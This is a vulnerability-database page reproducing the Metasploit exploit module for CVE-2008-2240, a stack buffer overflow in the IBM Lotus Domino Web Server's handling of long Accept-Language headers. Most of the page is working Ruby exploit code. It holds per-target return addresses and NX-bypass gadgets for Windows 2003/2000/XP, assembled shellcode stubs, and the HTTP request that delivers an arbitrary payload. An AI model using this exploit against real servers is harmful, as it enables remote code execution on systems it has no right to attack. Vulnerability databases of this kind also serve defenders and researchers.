Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

IBM Lotus Domino Web Server - Accept-Language Stack Buffer Overflow (Metasploit)

🗓️ 11 Nov 2010 00:00:00Reported by MetasploitType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 34 Views

IBM Lotus Domino Web Server Accept-Language Stack Buffer Overflow prior to version 7.0.3FP1 and 8.0.1. Triggered by HTTP request with Accept-Language header greater than 114 bytes

Related
Code
ReporterTitlePublishedViews
Family
Tenable Nessus		Lotus Domino < 8.0.1 / 7.0.3 FP1 Multiple Vulnerabilities
18 Aug 200400:00
nessus
Tenable Nessus		IBM Lotus Domino < 8.0.1 / 7.0.3 FP1 Multiple Vulnerabilities
23 May 200800:00
nessus
Circl		CVE-2008-2240
11 Nov 201000:00
circl
Check Point Advisories		IBM Lotus Domino Web Server HTTP Header Buffer Overflow (CVE-2008-2240)
17 Jun 200800:00
checkpoint_advisories
CVE		CVE-2008-2240
22 May 200810:00
cve
Cvelist		CVE-2008-2240
22 May 200810:00
cvelist
d2		DSquare Exploit Pack: D2SEC_LOTUS_DOMINO_HTTP
22 May 200813:09
d2
canvas		Immunity Canvas: LOTUS_DOMINO_HTTP
22 May 200813:09
canvas
Metasploit		IBM Lotus Domino Web Server Accept-Language Stack Buffer Overflow
16 Apr 200906:08
metasploit
NVD		CVE-2008-2240
22 May 200813:09
nvd
Rows per page
##
# $Id: domino_http_accept_language.rb 10998 2010-11-11 22:43:22Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'			=> 'IBM Lotus Domino Web Server Accept-Language Stack Buffer Overflow',
			'Description'		=> %q{
					This module exploits a stack buffer overflow in IBM Lotus Domino Web Server
				prior to version 7.0.3FP1 and 8.0.1. This flaw is triggered by any HTTP
				request with an Accept-Language header greater than 114 bytes.
			},
			'Author'		=> [ 'Fairuzan Roslan riaf[at]mysec.org', 'Earl Marcus klks[at]mysec.org' ],
			'License'		=> MSF_LICENSE,
			'Version'		=> '$Revision: 10998 $',
			'References'		=>
				[
					['CVE', '2008-2240'],
					['OSVDB', '45415'],
					['BID', '29310'],
					['URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21303057'],
				],
			'DefaultOptions'	=>
				{
					'EXITFUNC'	=> 'thread',
				},
			'Privileged'		=> true,
			'Payload'		=>
				{
					'Space'			=> 800,
					'BadChars'		=> "\x00\x0a\x20\x2c\x3b",
					'StackAdjustment'	=> -3500,
				},
			'Platform'		=>	'win',
			'Targets'		=>
				[

					['Lotus Domino 7.0 on Windows 2003 SP1 English(NX)',
						{
							'FixESP'	=> 0x70335c79, # add esp, 0x324, ret	 	@fontmanager.dll
							'FixESI'	=> 0x603055da, # push esp, pop esi, ret		@nnotes.dll
							'FixEBP'	=> 0x60a8bc90, # push esp, pop ebp, ret 0x10	@nnotes.dll
							'Ret'		=> 0x62c838c7, # ret 0x12e			@nlsccstr.dl
							'DisableNX'	=> 0x7c83e413, # NX Disable			@ntdll.dll
							'JmpESP'	=> 0x62c6072e, # jmp esp			@nlsccstr.dll
						}
					],

					['Lotus Domino 7.0 on Windows 2003 SP2 English(NX)',
						{
							'FixESP'	=> 0x70335c79, # add esp, 0x324, ret 		@fontmanager.dll
							'FixESI'	=> 0x603055da, # push esp, pop esi, ret		@nnotes.dll
							'FixEBP'	=> 0x60a8bc90, # push esp, pop ebp, ret 0x10	@nnotes.dll
							'Ret'		=> 0x62c838c7, # ret 0x12e			@nlsccstr.dll
							'DisableNX'	=> 0x7c83f517, # NX Disable			@ntdll.dll
							'JmpESP'	=> 0x62c6072e, # jmp esp			@nlsccstr.dll
						}
					],

					['Lotus Domino 7.0 on Windows 2003/2000/XP English(NO NX)',
						{
							'FixESP'	=> 0x70335c79, # add esp, 0x324, ret 		@fontmanager.dll
							'JmpESP'	=> 0x62c6072e, # jmp esp			@lsccstr.dll
						}
					],

					['Lotus Domino 8.0 on Windows 2003 SP1 English(NX)',
						{
							'FixESP'	=> 0x7ea0615c, # add esp, 0x324, ret		@net.dll
							'FixESI'	=> 0x639a7f87, # push esp, pop esi, ret		@nlsccstr.dll
							'FixEBP'	=> 0x6391c9f7, # push esp, pop ebp, ret 0x10	@nlsccstr.dll
							'Ret'		=> 0x7f8b0628, # ret 0x12e			@j9gc23.dll
							'DisableNX'	=> 0x7c83e413, # NX Disable			@ntdll.dll
							'JmpESP'	=> 0x6391071e, # jmp esp 			@nlsccstr.dll
						}
					],

					['Lotus Domino 8.0 on Windows 2003 SP2 English(NX)',
						{
							'FixESP'	=> 0x7ea0615c, # add esp, 0x324, ret		@net.dll
							'FixESI'	=> 0x639a7f87, # push esp, pop esi, ret		@nlsccstr.dll
							'FixEBP'	=> 0x6391c9f7, # push esp, pop ebp, ret 0x10	@nlsccstr.dll
							'Ret'		=> 0x7f8b0628, # ret 0x12e			@j9gc23.dll
							'DisableNX'	=> 0x7c83f517, # NX Disable			@ntdll.dll
							'JmpESP'	=> 0x6391071e, # jmp esp			@nlsccstr.dll
						}
					],

					['Lotus Domino 8.0 on Windows 2003/2000/XP English(NO NX)',
						{
							'FixESP'	=> 0x7ea0615c, # add esp, 0x324, ret		@net.dll
							'JmpESP'	=> 0x6391071e, # jmp esp			@nlsccstr.dll
						}
					],

				],
			'DisclosureDate' => 'May 20 2008'))

		register_options( [ Opt::RPORT(80) ], self.class )
	end

	def exploit
		connect

		lang = rand_text_alphanumeric(116)				# greetz to hateful chris
		lang[ 56,  4 ] = [ 0xfffffffe ].pack('V')			# Fix Second crash (esi)
		lang[ 68,  4 ] = [ 0x7ffaf0ec ].pack('V')			# Fix Second crash (eax)
		lang[ 104, 4 ] = [ 0x7ffaf030 ].pack('V')			# Fix First crash
		lang[ 112, 4 ] = [target['FixESP']].pack('V')			# 1
		lang << "\x00"
		lang << payload.encoded

		if(not target['DisableNX'])
			lang[ 16, 15 ] = Metasm::Shellcode.assemble(Metasm::Ia32.new, "add esp,-0xc4 pop edi sub edi,-0x86 call edi").encode_string		# 4
			lang[ 80,  4 ] = [target['JmpESP']].pack('V')		# 2
			lang[ 84,  2 ] = Rex::Arch::X86.jmp_short(-0x46)	# 3 jmp back to top
		else
			lang[ 16, 16 ] = Metasm::Shellcode.assemble(Metasm::Ia32.new, "add esp,-0xd8 pop edi pop edi sub edi,-0x86 call edi").encode_string	# 8
			lang[ 80,  4 ] = [target['FixESI']].pack('V')		# 2
			lang[ 84,  4 ] = [target['FixEBP']].pack('V')		# 3
			lang[ 88,  4 ] = [target['Ret']].pack('V')		# 4
			lang[ 92,  4 ] = [target['JmpESP']].pack('V')		# 6
			lang[ 100, 2 ] = Rex::Arch::X86.jmp_short(-0x56)	# 7  jmp back to top
			lang[ 108, 4 ] = [target['DisableNX']].pack('V')	# 5
		end

		uri = rand_text_alpha_lower(16) + '.nsf?' + rand_text_highascii(1)	# Trigger

		print_status("Trying target #{target.name}...")
		send_request_raw({
						'uri'			=> "#{uri}",
						'method'		=> 'GET',
						'headers'		=>
						{
							'Accept'		=> '*/*',
							'Accept-Language'	=> "#{lang}",
							'Accept-Encoding'	=> 'gzip,deflate',
							'Keep-Alive'		=> '300',
							'Connection'		=> 'keep-alive',
							'User-Agent'		=> 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
						}
					}, 5)
		handler
		disconnect
	end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
11 Nov 2010 00:00Current
7High risk
Vulners AI Score7
CVSS 210
EPSS0.84201
ibm lotus dominoweb serverstack buffer overflowaccept-languagehttp request7.0.3fp18.0.1buffer overflowcve-2008-2240osvdb-45415bid-29310may 20 2008
34